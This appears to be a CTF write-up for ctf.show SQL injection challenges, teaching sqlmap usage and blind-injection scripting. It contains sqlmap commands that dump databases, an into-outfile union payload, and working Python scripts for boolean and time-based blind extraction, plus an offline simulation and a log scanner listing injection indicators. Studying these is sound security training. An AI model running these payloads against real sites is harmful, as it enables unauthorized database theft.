Goal:
Learn how to use sqlmap, and how to write blind-injection scripts.
Full sqlmap usage reference: Usage · sqlmapproject/sqlmap Wiki · GitHub
Challenges 1-9
```bash
python sqlmap.py -u "http://86f7cecd-a3fe-42ff-86e7-ac458123807d.challenge.ctf.show/?id=1" --batch --banner
# --batch: never ask for user input, use the default behaviour
# --banner: retrieve the DBMS banner (fingerprint)
python sqlmap.py -u "http://86f7cecd-a3fe-42ff-86e7-ac458123807d.challenge.ctf.show/?id=1" --batch --dbs
# enumerate the DBMS's databases
python sqlmap.py -u "http://86f7cecd-a3fe-42ff-86e7-ac458123807d.challenge.ctf.show/?id=1" --batch --tables -D ctfshow
# list the tables of the ctfshow database
python sqlmap.py -u "http://86f7cecd-a3fe-42ff-86e7-ac458123807d.challenge.ctf.show/?id=1" --batch --dump -T flag -D ctfshow
# dump the contents of the flag table in the ctfshow database
python sqlmap.py -u "http://86f7cecd-a3fe-42ff-86e7-ac458123807d.challenge.ctf.show/?id=1" --batch -D ctfshow -T flag --columns
# list the columns of the flag table in the ctfshow database
```
-D: the database to enumerate
--dbs: enumerate the DBMS's databases
Challenge 7
Unexpectedly, the query result is not displayed in the response (no echo), so the `into outfile` form can be used (error-based injection did not work here, not sure why).
payload:
```
http://f0f8b18b-9240-4fde-98cc-10dd1ef882d0.challenge.ctf.show/?id=0')) union select 1,2,group_concat(schema_name) from information_schema.schemata into outfile "/var/www/html/1.txt"%23
```
Then visit 1.txt.
Boolean-based blind injection
Suppose the SQL statement is
```sql
select xx from yy where zz
select xx from yy where zz='0' or substr((select database()),1,1) = 'a'
```
All blind injection reduces to two basic problems (everything else is a substitution for, or an equivalent of, these two):
- string truncation (extracting one character)
- comparison
To make it scriptable, the comparison is rewritten as `or ascii(substr((select database()),1,1))=i`.
```python
# author Fnylad
import requests

s = requests.session()
url = "http://localhost/sqli-labs-master/Less-8/?id=0'"
table = ""
for i in range(1, 46):           # position of the character being recovered
    print(i)
    for j in range(32, 127):     # candidate printable ASCII code
        # database name (web1)
        # payload = 'or ord(substr((select database()) from {0} for 1))={1}%23'.format(i, j)
        # table names
        # payload = 'or ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from {0} for 1))={1}%23'.format(i, j)
        # column names (only one payload line may be active at a time; a second
        # active assignment would silently overwrite the first)
        payload = 'or ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()) from {0} for 1))={1}%23'.format(i, j)
        rs = s.get(url=url + payload).text
        if 'You' in rs:          # the page text that marks the "true" branch
            table += chr(j)
            print(table)
            break
```
Time-based blind injection
```sql
if((condition), sleep(5), 0);
CASE WHEN (condition) THEN sleep(5) ELSE 0 END;
```
If `if` and `case` are banned and you still want the truth of the condition to decide whether sleep() fires, fold the condition into sleep() by multiplication:
```sql
sleep(5*(condition))
```
Many people write the script like this:
```python
import requests
import time

url = "http://c5dd886a-fb31-4b20-82ff-14ef39a7ff94.challenge.ctf.show/"
charset = "0123456789abcdefghijklmnopqrstuvwxyz{}-"
flag = ""
for i in range(1, 50):
    for j in charset:
        payload = f"?id=1' and if(substr((select database()),{i},1)=\"{j}\",sleep(5),0)--+"
        full_url = url + payload
        start = time.time()
        res = requests.get(url=full_url)
        end = time.time()
        if end - start > 4.9:    # sleep(5) fired, so this character matched
            flag += j
            print(flag)
            break
```
This is actually not good! We found that, apart from sleep(), almost nothing lets you control the delay length precisely, and a script written this way means: however long you delay, I wait that long. Too slow! If one delay takes an hour, do you wait an hour too? Clearly unwise. This is better:
```python
try:
    requests.get(url, timeout=3)
except requests.exceptions.Timeout:   # only a timeout counts; other errors are not a "true" answer
    print("The delay occurred, injection succeeded")
```
The complete script follows. When extracting the flag, note that you must query the ctfshow database; if you don't say so explicitly, the current database, security, is queried instead (this tripped me up so badly I doubted myself!!).
```python
# Author:Fnylad
import requests

url = "http://a2bebb9c-bd71-4441-bc7a-c2e4c66eed20.challenge.ctf.show/"
charset = "0123456789abcdefghijklmnopqrstuvwxyz{}-"
flag = ""
for i in range(1, 50):
    for j in charset:
        # databases
        # payload = f"?id=1' and if(substr((select group_concat(schema_name) from information_schema.schemata),{i},1)=\"{j}\",sleep(5),0)--+"
        # tables in the ctfshow database
        # payload = f"?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=\'ctfshow\'),{i},1)=\"{j}\",sleep(5),0)--+"
        # columns in the ctfshow database
        # payload = f"?id=1' and if(substr((select group_concat(column_name) from information_schema.columns where table_schema=\'ctfshow\'),{i},1)=\"{j}\",sleep(5),0)--+"
        # get the flag
        payload = f"?id=1' and if(substr((select group_concat(flag4a23) from ctfshow.flagug),{i},1)=\"{j}\",sleep(5),0)--+"
        full_url = url + payload
        try:
            res = requests.get(url=full_url, timeout=5)
        except requests.exceptions.Timeout:   # the sleep(5) fired: this character matched
            flag += j
            print(flag)
            break
```
Time-based blind injection (accelerated); the same applies to boolean-based blind
```python
import requests

url = 'http://01faf912-1730-485f-b5b4-01f0107b62ec.challenge.ctf.show:8080/?id='
flag = ''
for i in range(1, 100):
    low = 32                  # invariant: low <= ascii(char) < high
    high = 128
    while 1:
        mid = low + (high - low) // 2
        if low == mid:        # interval collapsed to a single value: character found
            flag += chr(mid)
            print(flag)
            if chr(mid) == '}':
                exit()
            break
        # payload = "1' and if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},sleep(0.5),0)-- -".format(i, mid)
        # payload = "1' and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flagug')),{},1))<{},sleep(0.5),0)-- -".format(i, mid)
        payload = "1' and if(ascii(substr((select/**/group_concat(flag4a23)from(ctfshow.flagug)),{},1))<{},sleep(0.5),0)-- -".format(i, mid)
        print(url + payload)
        # the timeout must not exceed the sleep() interval, yet must stay above the
        # normal response time, otherwise characters are misclassified
        try:
            r = requests.get(url=url + payload, timeout=0.5).text
            low = mid         # answered in time: condition false, ascii(char) >= mid
        except requests.exceptions.Timeout:
            high = mid        # timed out: condition true, ascii(char) < mid
```
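To show why the halving search above needs about seven oracle queries per character while the earlier character-by-character loops need up to 95, here is an added offline simulation (my own code, not from the write-up). The HTTP request is replaced by a local `Oracle` over a constructed secret, and the lower bound is widened from 32 to 0 so that MySQL's `ascii('') = 0` marks the end of the string instead of the `}` sentinel.

```python
SECRET = "ctfshow{constructed_sample}"   # constructed stand-in for the hidden value

class Oracle:
    """Stand-in for one HTTP round trip: answers a single yes/no question."""
    def __init__(self, secret):
        self.secret = secret
        self.calls = 0                   # number of questions asked so far

    def code_at(self, pos):
        # ascii(substr(s, pos, 1)) with a 1-based pos; past the end substr()
        # yields '' and MySQL's ascii('') is 0, which marks the end of the string
        return ord(self.secret[pos - 1]) if pos <= len(self.secret) else 0

    def equals(self, pos, value):        # the "... = value" question
        self.calls += 1
        return self.code_at(pos) == value

    def less_than(self, pos, value):     # the "... < value" question
        self.calls += 1
        return self.code_at(pos) < value

def extract_linear(oracle, max_len=100):
    """Try every printable code 32..126 in turn, as the per-character loops do."""
    out = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            if oracle.equals(pos, code):
                out += chr(code)
                break
        else:
            return out                   # nothing matched: end of string
    return out

def extract_binary(oracle, max_len=100):
    """Halve [low, high) with one query per step; stop when mid == low."""
    out = ""
    for pos in range(1, max_len + 1):
        low, high = 0, 128               # invariant: low <= code < high
        while True:
            mid = low + (high - low) // 2
            if mid == low:               # interval is a single value
                break
            if oracle.less_than(pos, mid):
                high = mid
            else:
                low = mid
        if low == 0:                     # ascii('') == 0: string exhausted
            return out
        out += chr(low)
    return out
```

Running both extractors on `Oracle(SECRET)` and comparing `.calls` shows the halving search using exactly 7 queries per character (plus 7 to detect the end), against several dozen per character for the linear scan.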
Challenge 10
Raise the level; 5 is the highest. I went straight to the highest level; I think trying one level at a time is worse than just running the highest level from the start.
```bash
python sqlmap.py -u "http://86f7cecd-a3fe-42ff-86e7-ac458123807d.challenge.ctf.show/?id=1" --batch --tables -D ctfshow --level 5
```
Challenges 11-16 (form-based)
```bash
python sqlmap.py -u http://2b4ce143-bb87-44e6-b3f9-c98b21e508b5.challenge.ctf.show/ --batch --forms -D ctfshow -T flagugsd --dump
# --forms: test the form fields found on the target page
python sqlmap.py -u http://2b4ce143-bb87-44e6-b3f9-c98b21e508b5.challenge.ctf.show/ --wizard
# --wizard: beginner-oriented guided mode, worth experimenting with
python sqlmap.py -u http://2b4ce143-bb87-44e6-b3f9-c98b21e508b5.challenge.ctf.show/ --batch --wizard -D ctfshow -T flagugsd --dump
# this also gets the flag
```
Boolean-based blind injection
```python
import requests

url = 'http://3ae786d0-1fe7-471e-9aee-4255845dffc9.challenge.ctf.show:8080/'
flag = ''
for i in range(1, 100):
    low = 32                  # invariant: low <= ascii(char) < high
    high = 128
    while 1:
        mid = low + (high - low) // 2
        if low == mid:        # interval collapsed to a single value: character found
            flag += chr(mid)
            print(flag)
            if chr(mid) == '}':
                exit()
            break
        # -1') or sleep(10);#
        # payload = "admin') and if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},1,0)-- -".format(i, mid)
        # payload = "admin') and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),{},1))<{},1,0)-- -".format(i, mid)
        payload = "admin') and if(ascii(substr((select/**/group_concat(flag4)from(ctfshow.flag)),{},1))<{},1,0)-- -".format(i, mid)
        print(payload)
        data = {
            'passwd': 'a',
            'uname': payload,
        }
        r = requests.post(url=url, data=data).text
        if 'flag' in r:       # condition true: ascii(char) < mid
            high = mid
        else:
            low = mid
```
Time-based blind injection
```python
import requests

url = 'http://f4d786ab-1067-4c58-84d4-50e645bc0239.challenge.ctf.show/'
flag = ''
for i in range(1, 100):
    low = 32                  # invariant: low <= ascii(char) < high
    high = 128
    while 1:
        mid = low + (high - low) // 2
        if low == mid:        # interval collapsed to a single value: character found
            flag += chr(mid)
            print(flag)
            if chr(mid) == '}':
                exit()
            break
        # payload = "admin' and if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema='ctfshow')),{},1))<{},sleep(0.5),0)-- -".format(i, mid)
        # payload = "admin' and if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flagba')),{},1))<{},sleep(0.5),0)-- -".format(i, mid)
        payload = "admin' and if(ascii(substr((select/**/group_concat(flag4sa)from(ctfshow.flagba)),{},1))<{},sleep(0.5),0)-- -".format(i, mid)
        data = {
            'passwd': 'a',
            'uname': payload,
        }
        # timeout must not exceed the sleep() interval but must stay above the normal response time
        try:
            r = requests.post(url=url, data=data, timeout=0.5).text
            low = mid         # answered in time: condition false, ascii(char) >= mid
        except requests.exceptions.Timeout:
            high = mid        # timed out: condition true, ascii(char) < mid
```
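Seen from the defending side, the payload shapes used by every script in this write-up (`sleep(`, `ascii(substr(`, `information_schema`, `into outfile`, `/**/` spacing) are easy to spot in access logs, and a time-based probe additionally shows up as a response that stalls for about the sleep() interval. This added example (my own code, not part of the write-up) scans constructed log lines in an assumed `client status seconds path` format and groups the hits per client, so the burst of near-identical requests that a halving search produces stands out.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). Assumed format:
# "<client> <status> <response-seconds> <request-path>".
SAMPLE_LOG = """\
10.0.0.5 200 0.012 /?id=1
10.0.0.9 200 0.011 /?id=1'+and+if(ascii(substr((select+database()),1,1))<64,sleep(0.5),0)--+-
10.0.0.9 200 0.513 /?id=1'+and+if(ascii(substr((select+database()),1,1))<96,sleep(0.5),0)--+-
10.0.0.9 200 0.010 /?id=1'+and+if(ascii(substr((select+database()),1,1))<112,sleep(0.5),0)--+-
10.0.0.9 200 0.009 /?id=0'))+union+select+1,2,group_concat(schema_name)+from+information_schema.schemata+into+outfile+%22/var/www/html/1.txt%22%23
10.0.0.7 200 0.010 /?id=2
"""

# Literal fragments of the payload shapes used in this write-up, matched after
# URL-decoding and lower-casing so "+", "%20" and case variants still hit.
INDICATORS = ("sleep(", "ascii(substr(", "information_schema",
              "into outfile", "group_concat(", "/**/")

LINE_RE = re.compile(r"^(\S+) (\d{3}) ([\d.]+) (\S+)$")

def scan_line(line, slow_seconds=0.4):
    """Return (client, hits, slow) for a suspicious line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, _status, seconds, path = m.groups()
    decoded = unquote_plus(path).lower()
    hits = [ind for ind in INDICATORS if ind in decoded]
    slow = float(seconds) >= slow_seconds   # stalled response: sleep() fired
    if not hits and not slow:
        return None
    return client, hits, slow

def scan_log(text, slow_seconds=0.4):
    """Group suspicious requests per client so a probing burst stands out."""
    report = {}
    for line in text.splitlines():
        found = scan_line(line, slow_seconds)
        if found is None:
            continue
        client, hits, slow = found
        entry = report.setdefault(client, {"requests": 0, "slow": 0, "indicators": Counter()})
        entry["requests"] += 1
        entry["slow"] += int(slow)
        entry["indicators"].update(hits)
    return report
```

`scan_log(SAMPLE_LOG)` reports only client 10.0.0.9, with four flagged requests, one stalled response and the indicator counts per payload fragment.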
Challenge 17
passwd is the injection point. It became hard to detect the injection point; having found the form, you can capture the request with Burp and replay it. The captured request is saved in 1.txt.
```bash
python sqlmap.py -r "C:\Users\86181\Desktop\1.txt" --dbs --threads 8
```
The further along the challenges go, the harder scripting becomes...